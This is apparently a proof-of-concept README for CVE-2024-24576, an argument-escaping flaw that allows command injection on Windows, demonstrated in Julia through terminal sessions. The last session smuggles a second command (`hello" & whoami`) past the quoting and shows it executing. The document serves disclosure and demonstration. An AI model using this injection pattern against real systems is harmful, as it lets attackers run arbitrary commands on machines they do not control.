## https://sploitus.com/exploit?id=E6AA5780-7AD5-53E3-AD84-459E25D8FFE0
# [CVE-2024-24576](https://nvd.nist.gov/vuln/detail/CVE-2024-24576) PoC in [Julia](https://julialang.org)
```
λ julia main.jl
Enter arguments:
hello
Output:
Argument received: hello
```
```
λ julia main.jl
Enter arguments:
hello & whoami
Output:
Argument received: "hello & whoami"
```
```
λ julia main.jl
Enter arguments:
hello" & whoami
Output:
Argument received: "hello\"
desktop-9zk7mal\lpn
```
Note the escaped argument with the " & whoami
THIS IS NOT MY FINDING!
Sources:
https://github.com/rust-lang/rust/security/advisories/GHSA-q455-m56c-85mh https://www.bleepingcomputer.com/news/security/critical-rust-flaw-enables-windows-command-injection-attacks/
Based on https://github.com/frostb1ten/CVE-2024-24576-PoC